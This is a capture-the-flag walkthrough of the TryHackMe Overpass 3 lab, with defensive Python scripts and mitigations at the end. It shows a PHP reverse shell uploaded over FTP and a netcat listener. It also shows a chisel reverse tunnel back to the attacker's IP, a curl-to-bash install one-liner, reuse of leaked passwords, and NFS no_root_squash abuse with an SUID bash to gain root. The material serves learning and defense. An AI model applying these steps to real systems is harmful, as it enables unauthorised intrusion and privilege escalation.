BOX OVERVIEW
- Link: https://tryhackme.com/room/overpass3hosting
- Difficulty: Medium
- Target: web, user, root flags
- Highlight: port forwarding with chisel
- Tools: nmap, dirb, linpeas
- Technology: ftp, ssh, nfs
PREMISE

This is the third and final installment of the Overpass challenges on TryHackMe. Here are the other two overpass walkthroughs, just in case you missed them:
In today’s challenge, the team of comp-sci students is at it again with a new website hosting company. However, they haven’t learned much yet about security.
We’ll hack into their new site and escalate our privileges to the root user, and show them that they need to make some security upgrades.
ENUMERATION

First, we’ll note down our IPs in export format to use as bash variables.
export targetIP=10.10.232.238
export myIP=10.6.2.23
Let’s also start a regular nmap scan of all ports, and a dirb scan to sniff out web app directories.
The dirb scan found a /backups directory that reveals a backups.zip file.
/backups (backups.zip)
─[kalisurfer@parrot]─[~]
└──╼ $dirb http://10.10.232.238

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jan 5 11:16:14 2023
URL_BASE: http://10.10.232.238/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.232.238/ ----
==> DIRECTORY: http://10.10.232.238/backups/
+ http://10.10.232.238/cgi-bin/ (CODE:403|SIZE:217)
+ http://10.10.232.238/index.html (CODE:200|SIZE:1770)
---- Entering directory: http://10.10.232.238/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Thu Jan 5 11:23:15 2023
DOWNLOADED: 4612 - FOUND: 2
After unzipping the backups.zip file, we have two files:
priv.key
CustomerDetails.xlsx.pgp
Let’s move ahead and import the priv.key file using pgp, then decrypt the spreadsheet with it.
pgp --import priv.key
pgp --decrypt-file CustomerDetails.xlsx.pgp
And now there is a third file: CustomerDetails.xlsx
This file is a spreadsheet with customer data including usernames/passwords and credit card numbers! Let’s record the passwords in our notes.txt file for later reference.
username:password
paradox ShibesAreGreat123
0day OllieIsTheBestDog
muirlandoracle A11D0gsAreAw3s0me
The nmap scan shows a few ports open: an FTP service running on port 21, SSH on 22, and HTTP on 80.
The FTP server may allow anonymous login. We’ll test that out soon. First, we’ll drill in a bit more on the open ports with a second nmap scan:

WALKING THE WEBSITE

There’s not much of use on the website running on port 80. Nothing stands out in the text on the site except the potential usernames and hobbies:
Paradox - Our lead web designer, Paradox can help you create your dream website from the ground up
Elf - Overpass' newest intern, Elf. Elf helps maintain the webservers day to day to keep your site running smoothly and quickly.
MuirlandOracle - HTTPS and networking specialist. Muir's many years of experience and enthusiasm for networking keeps Overpass running, and your sites, online all of the time.
NinjaJc01 - James started Overpass, and keeps the business side running. If you have pricing questions or want to discuss how Overpass can help your business, reach out to him!
A quick look through the source code and the developer mode doesn’t reveal anything more here.
CONNECTING WITH FTP
We test out connecting to the FTP service as user paradox with the command:
lftp -u paradox $targetIP
Password: ShibesAreGreat123 (from the xlsx spreadsheet)
We are connected and can see a bunch of files and a directory for backups.

Now that we are connected to the web hosting service, we can upload a payload to spawn a reverse shell to give us an initial foothold into the box.
CRAFTING A REVERSE SHELL PAYLOAD

We’ll use the pentest monkey PHP reverse shell from revshells.com. This is a good choice because the web server executes a PHP file whenever it is requested, so simply loading the uploaded file in a browser runs the payload. I’ve also used this payload successfully before on another box.
Let’s go ahead and copy the PHP reverse shell, add our lhost and lport to the file, and save the revshell as rev.php. I’ll use port 8888.
UPLOADING THE PAYLOAD WITH FTP
Let’s use the terminal window still connected to the FTP service to upload the rev.php file with the command:
put rev.php
And now, the file is in position and ready to use.
SPINNING UP A NETCAT LISTENER TO CATCH A REVSHELL

nc -lvnp 8888
Next we’ll navigate in our browser to $targetIP/rev.php (the file name we uploaded).
At this point, our netcat listener catches the revshell and we now have an initial foothold as user apache!

Let’s search for the web.flag file with the following command:
find / -type f -name web.flag 2>/dev/null
The last part of this command (2>/dev/null) redirects standard error to /dev/null, the discard device, so all of the permission-denied errors are hidden and only real matches are printed.
And we’ve found it!
/usr/share/httpd/web.flag
STABILIZE A REVSHELL
We can use a Python one-liner to stabilize the shell enough to be able to switch users.
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now we can do a lateral move over to paradox’s account with the password from the spreadsheet.
su paradox
RUNNING LINPEAS ON THE TARGET MACHINE

The most interesting finding of linpeas is:
╔══════════╣ Analyzing NFS Exports Files (limit 70)
-rw-r--r--. 1 root root 54 Nov 18 2020 /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
The no_root_squash option is a misconfiguration: the NFS server stops mapping a client’s root user to the unprivileged nobody account, so anyone who can mount the export as root on their own machine can create root-owned files (including SUID binaries) inside it and then run them on the target.
👉 Recommended: No Root Squash
We can see that it is set on user James’ home folder. So now our attack vector is becoming clearer: we will look for a way to escalate privileges through James’ account.
BECOMING PARADOX
After stabilizing the revshell we can try a lateral move and switch users to paradox:
su paradox
Password: ShibesAreGreat123
EXPLOITING NFS WITH NO_ROOT_SQUASH

Following up now on the linpeas results, let’s investigate this NFS service a bit more. Nothing showed up in the nmap scan, but it did in the linpeas results, so my hunch is that the service is firewalled from the outside.
This isn’t a problem to work around, but we need to determine the port that the service is operating on. With the following command on the target machine we can find the port:
rpcinfo -p | grep nfs
We can see in the output that NFS is running on port 2049. We’ll use chisel, a TCP tunnelling tool that carries its traffic over HTTP and secures it with SSH, to help us reroute the blocked port to our attack machine.
USING CHISEL TO PORT FORWARD
We’ll need to grab chisel from the GitHub page. There are a few ways to install it from the repo. I chose to use the one-liner:
curl https://i.jpillora.com/chisel! | bash
Once installed, I copied the chisel binary over to the target machine. To get this done, we’ll spin up a simple HTTP server using Python, and then curl the file from the target machine.
Now that chisel is on both machines, let’s create the tunnel with the following commands to set up port forwarding for the NFS service running on port 2049, which is firewalled from the public.
From the attack box:
chisel server -p 7777 --reverse -v
From victim box:
./chisel client 10.6.2.23:7777 R:2049:127.0.0.1:2049 &
The &
at the end of the command instructs bash to run the command in the background in a subshell.
BECOMING JAMES

Now let’s check to see if the NFS has any mountable directories available. Because the chisel reverse tunnel exposes the target’s port 2049 on our own machine, we query localhost rather than the target’s IP (showmount also relies on the portmapper on port 111, which the tunnel does not forward, so if it fails, mounting directly still works):
showmount -e 127.0.0.1
Another way to check is to run this on the target:
cat /etc/exports
Now let’s go ahead and mount the export on the folder /mount (which already exists on my machine), again through the tunnel on localhost:
sudo mount -t nfs 127.0.0.1:/ /mount
The user.flag is right there in the /home/james directory! Checking for hidden files and directories with “ls -la” reveals a hidden directory (.ssh). Inside this directory we’ve found an ssh key.
Let’s copy this over to our machine so that we can ssh directly into James’ account without needing their password.

GAINING ROOT PRIVILEGES WITH PERSISTENCE
From James’ account, we should be able to both set and run files with SUID bits to spawn bash as root. The export has no_root_squash, so the permission bits we set on the mounted share are honoured as-is on the target. Let’s first copy /bin/bash into James’ home directory (the exported folder):
On target box:
cp /bin/bash .
And then make it executable and set the SUID bit from our mounted NFS folder on the attack box:
chmod +xs bash
Last, but not least, let’s run it in privileged mode from the target box (the -p flag tells bash to keep the effective UID granted by the SUID bit instead of dropping it):
./bash -p
And we are now root! Let’s grab the root.txt in /root/root.txt.
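As an added detection example (not from the walkthrough), the script below scans a directory tree for setuid or setgid executables, which is exactly the artefact the copy-and-chmod step above leaves behind. A setuid file has no legitimate reason to exist in a home directory or on an NFS export, so a periodic scan over /home and every exported path catches this technique regardless of which shell was copied. The demo directory, file names and mode 4755 are constructed for the example.

```python
"""Detect setuid/setgid files where none belong, e.g. home directories or NFS exports."""
import os
import stat
import tempfile
from typing import List


def find_suid_files(root: str) -> List[str]:
    """Walk root and return regular files carrying the setuid or setgid bit.

    Symlinks are inspected with lstat and never followed, so a link to /bin/su
    inside a home directory does not produce a false positive.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:          # vanished or unreadable: skip it, do not abort the scan
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)


def describe(path: str) -> str:
    """Render one hit the way an alert line would: mode, owner uid, path."""
    st = os.lstat(path)
    return f"{stat.filemode(st.st_mode)} uid={st.st_uid} {path}"


def demo() -> List[str]:
    """Build a constructed 'home directory' holding an ordinary file and a copy
    named bash chmod'ed to 4755 (the pattern from the walkthrough), then scan it.

    The file is owned by whoever runs the demo, not root; the scan flags the
    setuid bit regardless of owner, because neither belongs in a home directory.
    """
    home = tempfile.mkdtemp(prefix="james-home-")
    with open(os.path.join(home, "user.flag"), "w") as fh:
        fh.write("constructed sample file\n")
    suid_copy = os.path.join(home, "bash")
    with open(suid_copy, "wb") as fh:
        fh.write(b"#!/bin/sh\n")     # stand-in for a copied /bin/bash
    os.chmod(suid_copy, 0o4755)
    return [os.path.relpath(p, home) for p in find_suid_files(home)]


if __name__ == "__main__":
    for hit in find_suid_files(os.path.expanduser("~")):
        print(describe(hit))
    print("demo hits:", demo())
```

Run it from cron against /home and each path listed in /etc/exports; on the target in this box it would report /home/james/bash the moment the SUID bit was set. The same check from the shell is `find /home -type f -perm /6000`, but the script version is easier to ship alerts from.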

RECOMMENDED MITIGATION STEPS

- Disable no_root_squash on NFS
- Change permissions on all parts of the website that are not intended to be seen by the public. This includes the /backups folder
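The export that linpeas reported and the first mitigation step above both come down to one file, /etc/exports. The following Python script is an added example (not part of the original walkthrough, and not linpeas’ own logic) that parses an exports file and flags the settings that made this box exploitable: no_root_squash, the insecure option, and a wildcard client. The sample text is constructed for the example; its first line is the export shown in the linpeas output, and its second line is a hardened version of the same export (the client range 10.10.0.0/16 is a placeholder) that the check should pass.

```python
"""Audit /etc/exports for NFS settings that enable the root-squash bypass."""
import re
from typing import Dict, List

# Constructed sample. Line 1 is the export linpeas reported on the box;
# line 2 is the hardened form: root squashed, no wildcard, privileged ports only.
SAMPLE_EXPORTS = """\
# /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
/home/james 10.10.0.0/16(rw,sync,root_squash)   # placeholder client range
"""

# One client spec is either "client(opt,opt)" or a bare "client".
_CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)|(\S+)")


def parse_exports(text: str) -> List[Dict[str, object]]:
    """Return one entry per (path, client) pair: {'path', 'client', 'options'}."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        if not rest:                                  # no client list: exported to everyone
            entries.append({"path": path, "client": "*", "options": []})
            continue
        for m in _CLIENT_RE.finditer(rest):
            if m.group(1) is not None:
                client = m.group(1)
                options = [o.strip() for o in m.group(2).split(",") if o.strip()]
            else:
                client, options = m.group(3), []
                if client.startswith("("):            # "(rw)" with no host also means every host
                    options = [o.strip() for o in client.strip("()").split(",") if o.strip()]
                    client = "*"
            entries.append({"path": path, "client": client, "options": options})
    return entries


def audit_exports(text: str) -> List[Dict[str, str]]:
    """Flag exports whose options let a client-side root create root-owned SUID files."""
    findings = []
    for e in parse_exports(text):
        opts = set(e["options"])
        where = f"{e['path']} -> {e['client']}"
        if "no_root_squash" in opts:
            findings.append({"export": where, "option": "no_root_squash",
                             "risk": "client root is not mapped to nobody and can write root-owned setuid binaries"})
        if "insecure" in opts:
            findings.append({"export": where, "option": "insecure",
                             "risk": "requests from unprivileged source ports are accepted, so any client user can speak NFS directly"})
        if e["client"] in ("*", "0.0.0.0/0"):
            findings.append({"export": where, "option": "wildcard-client",
                             "risk": "export is offered to every host that can reach port 2049"})
    return findings


def audit_file(path: str = "/etc/exports") -> List[Dict[str, str]]:
    """Audit a real exports file on the host running the script."""
    with open(path) as fh:
        return audit_exports(fh.read())


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"[{f['option']}] {f['export']}: {f['risk']}")
```

Against the sample, only the first line produces findings (all three), and the hardened second line passes. Note that root_squash is the exportfs default, so simply deleting no_root_squash from the line is enough; the script lists it explicitly so the intent survives future edits.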
👉 Recommended Tutorial: TryHackMe Challenge – Wonderland

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.